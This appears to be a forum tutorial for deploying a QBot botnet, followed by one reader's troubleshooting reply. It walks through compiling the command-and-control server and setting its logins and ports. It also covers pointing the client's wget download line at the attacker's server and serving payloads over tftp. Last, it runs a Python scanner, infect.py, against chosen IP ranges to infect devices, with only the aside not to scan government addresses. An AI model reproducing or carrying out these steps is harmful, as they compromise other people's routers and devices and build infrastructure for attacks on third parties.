QBot Tutorial / Setup

These files are public posted on Richy's website, QBot public files

Download the server.c , client.c and setup.sh files. Put these on your server. Make sure you have Centos 6! Now lets get started :

1. Lets install everything we need first. yum install gcc screen nc dos2unix nano

2. Edit the server.c via nano or SFTP. Change the MGM logins to what you want. They are listed by password, user. Also change the MGM port if you want. This is the port used to connect to the botnet.

3. gcc -o server server.c -pthread OR gcc -o server server.c -lpthread

4. Edit the client.c via nano or SFTP. Change the ip under CONFIG to your server ip and leave the port as 23 or change it. DO NOT SET SAME AS YOUR MGM PORT!

5. screen ./server 23 420 ( These are the default ports. 23 is the port the router opens to connect and 420 is the port you connect with. If you changed these replace them. ) This will open a black screen, then press Ctrl AD

6. Edit the client.c Wget line via nano or SFTP. Search for wget and change all three IPs in this line to your server IP

7. dos2unix setup.sh

8. bash setup.sh client.c yourhostip ( Once this is finished copy the "Your link : ". You need this for later

9. Make sure you setup tftp properly http://www.hastebin.com/poriwaqufu.hs

10. Now to setup the Python scanner to start getting bots. Download from HERE

11. yum install python-paramiko -y

12. Change your wget line in the infect.py file. This is where the link we copied earlier goes. Replace everything inside (" ") with your link and save the python scanner.

13. Now your all setup! To connect to your botnet make a new connection, put your server ip and the port you set in server.c and change connection to RAW and login with the details you set. To scan with the python scanner do python infect.py 376 B 122.3 1 . 122.3 is the ip range, you can change this if you want just don't scan Gov IPs.

I followed your tut did all the steps but one is causing a problem

5. screen ./server 23 420

I take it ./server is the dictionary where you keep the files server.c , client.c and setup.sh? when i run screen ./server 23 420 i get permission denied the dictionary is CHMOD 777 so im not sure what to do.
